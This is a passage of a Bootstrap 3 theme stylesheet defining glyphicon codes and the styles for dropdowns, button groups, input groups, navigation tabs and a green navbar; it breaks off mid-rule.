.glyphicon-circle-arrow-down:before {
  content: "\e134";
}
.glyphicon-globe:before {
  content: "\e135";
}
.glyphicon-wrench:before {
  content: "\e136";
}
.glyphicon-tasks:before {
  content: "\e137";
}
.glyphicon-filter:before {
  content: "\e138";
}
.glyphicon-briefcase:before {
  content: "\e139";
}
.glyphicon-fullscreen:before {
  content: "\e140";
}
.glyphicon-dashboard:before {
  content: "\e141";
}
.glyphicon-paperclip:before {
  content: "\e142";
}
.glyphicon-heart-empty:before {
  content: "\e143";
}
.glyphicon-link:before {
  content: "\e144";
}
.glyphicon-phone:before {
  content: "\e145";
}
.glyphicon-pushpin:before {
  content: "\e146";
}
.glyphicon-usd:before {
  content: "\e148";
}
.glyphicon-gbp:before {
  content: "\e149";
}
.glyphicon-sort:before {
  content: "\e150";
}
.glyphicon-sort-by-alphabet:before {
  content: "\e151";
}
.glyphicon-sort-by-alphabet-alt:before {
  content: "\e152";
}
.glyphicon-sort-by-order:before {
  content: "\e153";
}
.glyphicon-sort-by-order-alt:before {
  content: "\e154";
}
.glyphicon-sort-by-attributes:before {
  content: "\e155";
}
.glyphicon-sort-by-attributes-alt:before {
  content: "\e156";
}
.glyphicon-unchecked:before {
  content: "\e157";
}
.glyphicon-expand:before {
  content: "\e158";
}
.glyphicon-collapse-down:before {
  content: "\e159";
}
.glyphicon-collapse-up:before {
  content: "\e160";
}
.glyphicon-log-in:before {
  content: "\e161";
}
.glyphicon-flash:before {
  content: "\e162";
}
.glyphicon-log-out:before {
  content: "\e163";
}
.glyphicon-new-window:before {
  content: "\e164";
}
.glyphicon-record:before {
  content: "\e165";
}
.glyphicon-save:before {
  content: "\e166";
}
.glyphicon-open:before {
  content: "\e167";
}
.glyphicon-saved:before {
  content: "\e168";
}
.glyphicon-import:before {
  content: "\e169";
}
.glyphicon-export:before {
  content: "\e170";
}
.glyphicon-send:before {
  content: "\e171";
}
.glyphicon-floppy-disk:before {
  content: "\e172";
}
.glyphicon-floppy-saved:before {
  content: "\e173";
}
.glyphicon-floppy-remove:before {
  content: "\e174";
}
.glyphicon-floppy-save:before {
  content: "\e175";
}
.glyphicon-floppy-open:before {
  content: "\e176";
}
.glyphicon-credit-card:before {
  content: "\e177";
}
.glyphicon-transfer:before {
  content: "\e178";
}
.glyphicon-cutlery:before {
  content: "\e179";
}
.glyphicon-header:before {
  content: "\e180";
}
.glyphicon-compressed:before {
  content: "\e181";
}
.glyphicon-earphone:before {
  content: "\e182";
}
.glyphicon-phone-alt:before {
  content: "\e183";
}
.glyphicon-tower:before {
  content: "\e184";
}
.glyphicon-stats:before {
  content: "\e185";
}
.glyphicon-sd-video:before {
  content: "\e186";
}
.glyphicon-hd-video:before {
  content: "\e187";
}
.glyphicon-subtitles:before {
  content: "\e188";
}
.glyphicon-sound-stereo:before {
  content: "\e189";
}
.glyphicon-sound-dolby:before {
  content: "\e190";
}
.glyphicon-sound-5-1:before {
  content: "\e191";
}
.glyphicon-sound-6-1:before {
  content: "\e192";
}
.glyphicon-sound-7-1:before {
  content: "\e193";
}
.glyphicon-copyright-mark:before {
  content: "\e194";
}
.glyphicon-registration-mark:before {
  content: "\e195";
}
.glyphicon-cloud-download:before {
  content: "\e197";
}
.glyphicon-cloud-upload:before {
  content: "\e198";
}
.glyphicon-tree-conifer:before {
  content: "\e199";
}
.glyphicon-tree-deciduous:before {
  content: "\e200";
}
.glyphicon-cd:before {
  content: "\e201";
}
.glyphicon-save-file:before {
  content: "\e202";
}
.glyphicon-open-file:before {
  content: "\e203";
}
.glyphicon-level-up:before {
  content: "\e204";
}
.glyphicon-copy:before {
  content: "\e205";
}
.glyphicon-paste:before {
  content: "\e206";
}
.glyphicon-alert:before {
  content: "\e209";
}
.glyphicon-equalizer:before {
  content: "\e210";
}
.glyphicon-king:before {
  content: "\e211";
}
.glyphicon-queen:before {
  content: "\e212";
}
.glyphicon-pawn:before {
  content: "\e213";
}
.glyphicon-bishop:before {
  content: "\e214";
}
.glyphicon-knight:before {
  content: "\e215";
}
.glyphicon-baby-formula:before {
  content: "\e216";
}
.glyphicon-tent:before {
  content: "\26fa";
}
.glyphicon-blackboard:before {
  content: "\e218";
}
.glyphicon-bed:before {
  content: "\e219";
}
.glyphicon-apple:before {
  content: "\f8ff";
}
.glyphicon-erase:before {
  content: "\e221";
}
.glyphicon-hourglass:before {
  content: "\231b";
}
.glyphicon-lamp:before {
  content: "\e223";
}
.glyphicon-duplicate:before {
  content: "\e224";
}
.glyphicon-piggy-bank:before {
  content: "\e225";
}
.glyphicon-scissors:before {
  content: "\e226";
}
.glyphicon-bitcoin:before {
  content: "\e227";
}
.glyphicon-btc:before {
  content: "\e227";
}
.glyphicon-xbt:before {
  content: "\e227";
}
.glyphicon-yen:before {
  content: "\00a5";
}
.glyphicon-jpy:before {
  content: "\00a5";
}
.glyphicon-ruble:before {
  content: "\20bd";
}
.glyphicon-rub:before {
  content: "\20bd";
}
.glyphicon-scale:before {
  content: "\e230";
}
.glyphicon-ice-lolly:before {
  content: "\e231";
}
.glyphicon-ice-lolly-tasted:before {
  content: "\e232";
}
.glyphicon-education:before {
  content: "\e233";
}
.glyphicon-option-horizontal:before {
  content: "\e234";
}
.glyphicon-option-vertical:before {
  content: "\e235";
}
.glyphicon-menu-hamburger:before {
  content: "\e236";
}
.glyphicon-modal-window:before {
  content: "\e237";
}
.glyphicon-oil:before {
  content: "\e238";
}
.glyphicon-grain:before {
  content: "\e239";
}
.glyphicon-sunglasses:before {
  content: "\e240";
}
.glyphicon-text-size:before {
  content: "\e241";
}
.glyphicon-text-color:before {
  content: "\e242";
}
.glyphicon-text-background:before {
  content: "\e243";
}
.glyphicon-object-align-top:before {
  content: "\e244";
}
.glyphicon-object-align-bottom:before {
  content: "\e245";
}
.glyphicon-object-align-horizontal:before {
  content: "\e246";
}
.glyphicon-object-align-left:before {
  content: "\e247";
}
.glyphicon-object-align-vertical:before {
  content: "\e248";
}
.glyphicon-object-align-right:before {
  content: "\e249";
}
.glyphicon-triangle-right:before {
  content: "\e250";
}
.glyphicon-triangle-left:before {
  content: "\e251";
}
.glyphicon-triangle-bottom:before {
  content: "\e252";
}
.glyphicon-triangle-top:before {
  content: "\e253";
}
.glyphicon-console:before {
  content: "\e254";
}
.glyphicon-superscript:before {
  content: "\e255";
}
.glyphicon-subscript:before {
  content: "\e256";
}
.glyphicon-menu-left:before {
  content: "\e257";
}
.glyphicon-menu-right:before {
  content: "\e258";
}
.glyphicon-menu-down:before {
  content: "\e259";
}
.glyphicon-menu-up:before {
  content: "\e260";
}
.caret {
  display: inline-block;
  width: 0;
  height: 0;
  margin-left: 2px;
  vertical-align: middle;
  border-top: 4px dashed;
  border-right: 4px solid transparent;
  border-left: 4px solid transparent;
}
.dropup,
.dropdown {
  position: relative;
}
.dropdown-toggle:focus {
  outline: 0;
}
.dropdown-menu {
  position: absolute;
  top: 100%;
  left: 0;
  z-index: 1000;
  display: none;
  float: left;
  min-width: 160px;
  padding: 5px 0;
  margin: 2px 0 0;
  list-style: none;
  font-size: 14px;
  text-align: left;
  background-color: #444444;
  border: 1px solid #444444;
  border-radius: 0px;
  -webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
  box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
  background-clip: padding-box;
}
.dropdown-menu.pull-right {
  right: 0;
  left: auto;
}
.dropdown-menu .divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #515151;
}
.dropdown-menu > li > a {
  display: block;
  padding: 3px 20px;
  clear: both;
  font-weight: normal;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-menu > li > a:hover,
.dropdown-menu > li > a:focus {
  text-decoration: none;
  color: #ffffff;
  background-color: #515151;
}
.dropdown-menu > .active > a,
.dropdown-menu > .active > a:hover,
.dropdown-menu > .active > a:focus {
  color: #ffffff;
  text-decoration: none;
  outline: 0;
  background-color: #373737;
}
.dropdown-menu > .disabled > a,
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  color: #999999;
}
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  text-decoration: none;
  background-color: transparent;
  background-image: none;
  filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
  cursor: not-allowed;
}
.open > .dropdown-menu {
  display: block;
}
.open > a {
  outline: 0;
}
.dropdown-menu-right {
  left: auto;
  right: 0;
}
.dropdown-menu-left {
  left: 0;
  right: auto;
}
.dropdown-header {
  display: block;
  padding: 3px 20px;
  font-size: 12px;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-backdrop {
  position: fixed;
  left: 0;
  right: 0;
  bottom: 0;
  top: 0;
  z-index: 990;
}
.pull-right > .dropdown-menu {
  right: 0;
  left: auto;
}
.dropup .caret,
.navbar-fixed-bottom .dropdown .caret {
  border-top: 0;
  border-bottom: 4px solid;
  content: "";
}
.dropup .dropdown-menu,
.navbar-fixed-bottom .dropdown .dropdown-menu {
  top: auto;
  bottom: 100%;
  margin-bottom: 2px;
}
@media (min-width: 991px) {
  .navbar-right .dropdown-menu {
    left: auto;
    right: 0;
  }
  .navbar-right .dropdown-menu-left {
    left: 0;
    right: auto;
  }
}
.btn-group,
.btn-group-vertical {
  position: relative;
  display: inline-block;
  vertical-align: middle;
}
.btn-group > .btn,
.btn-group-vertical > .btn {
  position: relative;
  float: left;
}
.btn-group > .btn:hover,
.btn-group-vertical > .btn:hover,
.btn-group > .btn:focus,
.btn-group-vertical > .btn:focus,
.btn-group > .btn:active,
.btn-group-vertical > .btn:active,
.btn-group > .btn.active,
.btn-group-vertical > .btn.active {
  z-index: 2;
}
.btn-group .btn + .btn,
.btn-group .btn + .btn-group,
.btn-group .btn-group + .btn,
.btn-group .btn-group + .btn-group {
  margin-left: -1px;
}
.btn-toolbar {
  margin-left: -5px;
}
.btn-toolbar .btn-group,
.btn-toolbar .input-group {
  float: left;
}
.btn-toolbar > .btn,
.btn-toolbar > .btn-group,
.btn-toolbar > .input-group {
  margin-left: 5px;
}
.btn-group > .btn:not(:first-child):not(:last-child):not(.dropdown-toggle) {
  border-radius: 0;
}
.btn-group > .btn:first-child {
  margin-left: 0;
}
.btn-group > .btn:first-child:not(:last-child):not(.dropdown-toggle) {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
.btn-group > .btn:last-child:not(:first-child),
.btn-group > .dropdown-toggle:not(:first-child) {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
.btn-group > .btn-group {
  float: left;
}
.btn-group > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
.btn-group > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
.btn-group .dropdown-toggle:active,
.btn-group.open .dropdown-toggle {
  outline: 0;
}
.btn-group > .btn + .dropdown-toggle {
  padding-left: 8px;
  padding-right: 8px;
}
.btn-group > .btn-lg + .dropdown-toggle {
  padding-left: 12px;
  padding-right: 12px;
}
.btn-group.open .dropdown-toggle {
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn-group.open .dropdown-toggle.btn-link {
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn .caret {
  margin-left: 0;
}
.btn-lg .caret {
  border-width: 5px 5px 0;
  border-bottom-width: 0;
}
.dropup .btn-lg .caret {
  border-width: 0 5px 5px;
}
.btn-group-vertical > .btn,
.btn-group-vertical > .btn-group,
.btn-group-vertical > .btn-group > .btn {
  display: block;
  float: none;
  width: 100%;
  max-width: 100%;
}
.btn-group-vertical > .btn-group > .btn {
  float: none;
}
.btn-group-vertical > .btn + .btn,
.btn-group-vertical > .btn + .btn-group,
.btn-group-vertical > .btn-group + .btn,
.btn-group-vertical > .btn-group + .btn-group {
  margin-top: -1px;
  margin-left: 0;
}
.btn-group-vertical > .btn:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.btn-group-vertical > .btn:first-child:not(:last-child) {
  border-top-right-radius: 0px;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn:last-child:not(:first-child) {
  border-bottom-left-radius: 0px;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.btn-group-vertical > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.btn-group-justified {
  display: table;
  width: 100%;
  table-layout: fixed;
  border-collapse: separate;
}
.btn-group-justified > .btn,
.btn-group-justified > .btn-group {
  float: none;
  display: table-cell;
  width: 1%;
}
.btn-group-justified > .btn-group .btn {
  width: 100%;
}
.btn-group-justified > .btn-group .dropdown-menu {
  left: auto;
}
[data-toggle="buttons"] > .btn input[type="radio"],
[data-toggle="buttons"] > .btn-group > .btn input[type="radio"],
[data-toggle="buttons"] > .btn input[type="checkbox"],
[data-toggle="buttons"] > .btn-group > .btn input[type="checkbox"] {
  position: absolute;
  clip: rect(0, 0, 0, 0);
  pointer-events: none;
}
.input-group {
  position: relative;
  display: table;
  border-collapse: separate;
}
.input-group[class*="col-"] {
  float: none;
  padding-left: 0;
  padding-right: 0;
}
.input-group .form-control {
  position: relative;
  z-index: 2;
  float: left;
  width: 100%;
  margin-bottom: 0;
}
.input-group-lg > .form-control,
.input-group-lg > .input-group-addon,
.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
select.input-group-lg > .form-control,
select.input-group-lg > .input-group-addon,
select.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  line-height: 45px;
}
textarea.input-group-lg > .form-control,
textarea.input-group-lg > .input-group-addon,
textarea.input-group-lg > .input-group-btn > .btn,
select[multiple].input-group-lg > .form-control,
select[multiple].input-group-lg > .input-group-addon,
select[multiple].input-group-lg > .input-group-btn > .btn {
  height: auto;
}
.input-group-sm > .form-control,
.input-group-sm > .input-group-addon,
.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
select.input-group-sm > .form-control,
select.input-group-sm > .input-group-addon,
select.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  line-height: 30px;
}
textarea.input-group-sm > .form-control,
textarea.input-group-sm > .input-group-addon,
textarea.input-group-sm > .input-group-btn > .btn,
select[multiple].input-group-sm > .form-control,
select[multiple].input-group-sm > .input-group-addon,
select[multiple].input-group-sm > .input-group-btn > .btn {
  height: auto;
}
.input-group-addon,
.input-group-btn,
.input-group .form-control {
  display: table-cell;
}
.input-group-addon:not(:first-child):not(:last-child),
.input-group-btn:not(:first-child):not(:last-child),
.input-group .form-control:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.input-group-addon,
.input-group-btn {
  width: 1%;
  white-space: nowrap;
  vertical-align: middle;
}
.input-group-addon {
  padding: 6px 12px;
  font-size: 14px;
  font-weight: normal;
  line-height: 1;
  color: #666666;
  text-align: center;
  background-color: #eeeeee;
  border: 1px solid #cccccc;
  border-radius: 0px;
}
.input-group-addon.input-sm {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0px;
}
.input-group-addon.input-lg {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0px;
}
.input-group-addon input[type="radio"],
.input-group-addon input[type="checkbox"] {
  margin-top: 0;
}
.input-group .form-control:first-child,
.input-group-addon:first-child,
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group > .btn,
.input-group-btn:first-child > .dropdown-toggle,
.input-group-btn:last-child > .btn:not(:last-child):not(.dropdown-toggle),
.input-group-btn:last-child > .btn-group:not(:last-child) > .btn {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
.input-group-addon:first-child {
  border-right: 0;
}
.input-group .form-control:last-child,
.input-group-addon:last-child,
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group > .btn,
.input-group-btn:last-child > .dropdown-toggle,
.input-group-btn:first-child > .btn:not(:first-child),
.input-group-btn:first-child > .btn-group:not(:first-child) > .btn {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
.input-group-addon:last-child {
  border-left: 0;
}
.input-group-btn {
  position: relative;
  font-size: 0;
  white-space: nowrap;
}
.input-group-btn > .btn {
  position: relative;
}
.input-group-btn > .btn + .btn {
  margin-left: -1px;
}
.input-group-btn > .btn:hover,
.input-group-btn > .btn:focus,
.input-group-btn > .btn:active {
  z-index: 2;
}
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group {
  margin-right: -1px;
}
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group {
  margin-left: -1px;
}
.nav {
  margin-bottom: 0;
  padding-left: 0;
  list-style: none;
}
.nav > li {
  position: relative;
  display: block;
}
.nav > li > a {
  position: relative;
  display: block;
  padding: 10px 15px;
}
.nav > li > a:hover,
.nav > li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.nav > li.disabled > a {
  color: #999999;
}
.nav > li.disabled > a:hover,
.nav > li.disabled > a:focus {
  color: #999999;
  text-decoration: none;
  background-color: transparent;
  cursor: not-allowed;
}
.nav .open > a,
.nav .open > a:hover,
.nav .open > a:focus {
  background-color: #eeeeee;
  border-color: #10bf00;
}
.nav .nav-divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #e5e5e5;
}
.nav > li > a > img {
  max-width: none;
}
.nav-tabs {
  border-bottom: 1px solid #dddddd;
}
.nav-tabs > li {
  float: left;
  margin-bottom: -1px;
}
.nav-tabs > li > a {
  margin-right: 2px;
  line-height: 1.42857143;
  border: 1px solid transparent;
  border-radius: 0px 0px 0 0;
}
.nav-tabs > li > a:hover {
  border-color: #eeeeee #eeeeee #dddddd;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  color: #666666;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-bottom-color: transparent;
  cursor: default;
}
.nav-tabs.nav-justified {
  width: 100%;
  border-bottom: 0;
}
.nav-tabs.nav-justified > li {
  float: none;
}
.nav-tabs.nav-justified > li > a {
  text-align: center;
  margin-bottom: 5px;
}
.nav-tabs.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  left: auto;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-tabs.nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs.nav-justified > li > a {
  margin-right: 0;
  border-radius: 0px;
}
.nav-tabs.nav-justified > .active > a,
.nav-tabs.nav-justified > .active > a:hover,
.nav-tabs.nav-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0px 0px 0 0;
  }
  .nav-tabs.nav-justified > .active > a,
  .nav-tabs.nav-justified > .active > a:hover,
  .nav-tabs.nav-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.nav-pills > li {
  float: left;
}
.nav-pills > li > a {
  border-radius: 0px;
}
.nav-pills > li + li {
  margin-left: 2px;
}
.nav-pills > li.active > a,
.nav-pills > li.active > a:hover,
.nav-pills > li.active > a:focus {
  color: #ffffff;
  background-color: #10bf00;
}
.nav-stacked > li {
  float: none;
}
.nav-stacked > li + li {
  margin-top: 2px;
  margin-left: 0;
}
.nav-justified {
  width: 100%;
}
.nav-justified > li {
  float: none;
}
.nav-justified > li > a {
  text-align: center;
  margin-bottom: 5px;
}
.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  left: auto;
}
@media (min-width: 768px) {
  .nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs-justified {
  border-bottom: 0;
}
.nav-tabs-justified > li > a {
  margin-right: 0;
  border-radius: 0px;
}
.nav-tabs-justified > .active > a,
.nav-tabs-justified > .active > a:hover,
.nav-tabs-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0px 0px 0 0;
  }
  .nav-tabs-justified > .active > a,
  .nav-tabs-justified > .active > a:hover,
  .nav-tabs-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.tab-content > .tab-pane {
  display: none;
}
.tab-content > .active {
  display: block;
}
.nav-tabs .dropdown-menu {
  margin-top: -1px;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.navbar {
  position: relative;
  min-height: 55px;
  margin-bottom: 20px;
  border: 1px solid transparent;
}
@media (min-width: 991px) {
  .navbar {
    border-radius: 0px;
  }
}
@media (min-width: 991px) {
  .navbar-header {
    float: left;
  }
}
.navbar-collapse {
  overflow-x: visible;
  padding-right: 15px;
  padding-left: 15px;
  border-top: 1px solid transparent;
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1);
  -webkit-overflow-scrolling: touch;
}
.navbar-collapse.in {
  overflow-y: auto;
}
@media (min-width: 991px) {
  .navbar-collapse {
    width: auto;
    border-top: 0;
    box-shadow: none;
  }
  .navbar-collapse.collapse {
    display: block !important;
    height: auto !important;
    padding-bottom: 0;
    overflow: visible !important;
  }
  .navbar-collapse.in {
    overflow-y: visible;
  }
  .navbar-fixed-top .navbar-collapse,
  .navbar-static-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    padding-left: 0;
    padding-right: 0;
  }
}
.navbar-fixed-top .navbar-collapse,
.navbar-fixed-bottom .navbar-collapse {
  max-height: 340px;
}
@media (max-device-width: 480px) and (orientation: landscape) {
  .navbar-fixed-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    max-height: 200px;
  }
}
.container > .navbar-header,
.container-fluid > .navbar-header,
.container > .navbar-collapse,
.container-fluid > .navbar-collapse {
  margin-right: -15px;
  margin-left: -15px;
}
@media (min-width: 991px) {
  .container > .navbar-header,
  .container-fluid > .navbar-header,
  .container > .navbar-collapse,
  .container-fluid > .navbar-collapse {
    margin-right: 0;
    margin-left: 0;
  }
}
.navbar-static-top {
  z-index: 1000;
  border-width: 0 0 1px;
}
@media (min-width: 991px) {
  .navbar-static-top {
    border-radius: 0;
  }
}
.navbar-fixed-top,
.navbar-fixed-bottom {
  position: fixed;
  right: 0;
  left: 0;
  z-index: 1030;
}
@media (min-width: 991px) {
  .navbar-fixed-top,
  .navbar-fixed-bottom {
    border-radius: 0;
  }
}
.navbar-fixed-top {
  top: 0;
  border-width: 0 0 1px;
}
.navbar-fixed-bottom {
  bottom: 0;
  margin-bottom: 0;
  border-width: 1px 0 0;
}
.navbar-brand {
  float: left;
  padding: 17.5px 15px;
  font-size: 18px;
  line-height: 20px;
  height: 55px;
}
.navbar-brand:hover,
.navbar-brand:focus {
  text-decoration: none;
}
.navbar-brand > img {
  display: block;
}
@media (min-width: 991px) {
  .navbar > .container .navbar-brand,
  .navbar > .container-fluid .navbar-brand {
    margin-left: -15px;
  }
}
.navbar-toggle {
  position: relative;
  float: right;
  margin-right: 15px;
  padding: 9px 10px;
  margin-top: 10.5px;
  margin-bottom: 10.5px;
  background-color: transparent;
  background-image: none;
  border: 1px solid transparent;
  border-radius: 0px;
}
.navbar-toggle:focus {
  outline: 0;
}
.navbar-toggle .icon-bar {
  display: block;
  width: 22px;
  height: 2px;
  border-radius: 1px;
}
.navbar-toggle .icon-bar + .icon-bar {
  margin-top: 4px;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -15px;
}
.navbar-nav > li > a {
  padding-top: 10px;
  padding-bottom: 10px;
  line-height: 20px;
}
@media (max-width: 990px) {
  .navbar-nav .open .dropdown-menu {
    position: static;
    float: none;
    width: auto;
    margin-top: 0;
    background-color: transparent;
    border: 0;
    box-shadow: none;
  }
  .navbar-nav .open .dropdown-menu > li > a,
  .navbar-nav .open .dropdown-menu .dropdown-header {
    padding: 5px 15px 5px 25px;
  }
  .navbar-nav .open .dropdown-menu > li > a {
    line-height: 20px;
  }
  .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-nav .open .dropdown-menu > li > a:focus {
    background-image: none;
  }
}
@media (min-width: 991px) {
  .navbar-nav {
    float: left;
    margin: 0;
  }
  .navbar-nav > li {
    float: left;
  }
  .navbar-nav > li > a {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.navbar-form {
  margin-left: -15px;
  margin-right: -15px;
  padding: 10px 15px;
  border-top: 1px solid transparent;
  border-bottom: 1px solid transparent;
  -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
@media (min-width: 768px) {
  .navbar-form .inputbox,
  .navbar-form select,
  .navbar-form textarea,
  .navbar-form input {
    display: inline-block;
  }
}
@media (min-width: 768px) {
  .navbar-form .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .navbar-form .form-control-static {
    display: inline-block;
  }
  .navbar-form .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .navbar-form .input-group .input-group-addon,
  .navbar-form .input-group .input-group-btn,
  .navbar-form .input-group .form-control {
    width: auto;
  }
  .navbar-form .input-group > .form-control {
    width: 100%;
  }
  .navbar-form .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio,
  .navbar-form .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio label,
  .navbar-form .checkbox label {
    padding-left: 0;
  }
  .navbar-form .radio input[type="radio"],
  .navbar-form .checkbox input[type="checkbox"] {
    position: relative;
    margin-left: 0;
  }
  .navbar-form .has-feedback .form-control-feedback {
    top: 0;
  }
}
@media (max-width: 990px) {
  .navbar-form .form-group {
    margin-bottom: 5px;
  }
  .navbar-form .form-group:last-child {
    margin-bottom: 0;
  }
}
@media (min-width: 991px) {
  .navbar-form {
    width: auto;
    border: 0;
    margin-left: 0;
    margin-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    -webkit-box-shadow: none;
    box-shadow: none;
  }
}
.navbar-nav > li > .dropdown-menu {
  margin-top: 0;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.navbar-fixed-bottom .navbar-nav > li > .dropdown-menu {
  margin-bottom: 0;
  border-top-right-radius: 0px;
  border-top-left-radius: 0px;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.navbar-btn {
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
.navbar-btn.btn-sm {
  margin-top: 12.5px;
  margin-bottom: 12.5px;
}
.navbar-btn.btn-xs {
  margin-top: 16.5px;
  margin-bottom: 16.5px;
}
.navbar-text {
  margin-top: 17.5px;
  margin-bottom: 17.5px;
}
@media (min-width: 991px) {
  .navbar-text {
    float: left;
    margin-left: 15px;
    margin-right: 15px;
  }
}
@media (min-width: 991px) {
  .navbar-left {
    float: left !important;
  }
  .navbar-right {
    float: right !important;
    margin-right: -15px;
  }
  .navbar-right ~ .navbar-right {
    margin-right: 0;
  }
}
.navbar-default {
  background-color: #10bf00;
  border-color: #0ea600;
}
.navbar-default .navbar-brand {
  color: #c4ffbf;
}
.navbar-default .navbar-brand:hover,
.navbar-default .navbar-brand:focus {
  color: #96ff8c;
  background-color: transparent;
}
.navbar-default .navbar-text {
  color: #c4ffbf;
}
.navbar-default .navbar-nav > li > a {
  color: #c4ffbf;
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .disabled > a,
.navbar-default .navbar-nav > .disabled > a:hover,
.navbar-default .navbar-nav > .disabled > a:focus {
  color: #cccccc;
  background-color: transparent;
}
.navbar-default .navbar-toggle {
  border-color: #10bf00;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background-color: #10bf00;
}
.navbar-default .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #0ea600;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  background-color: transparent;
  color: #ffffff;
}
@media (max-width: 990px) {
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #c4ffbf;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
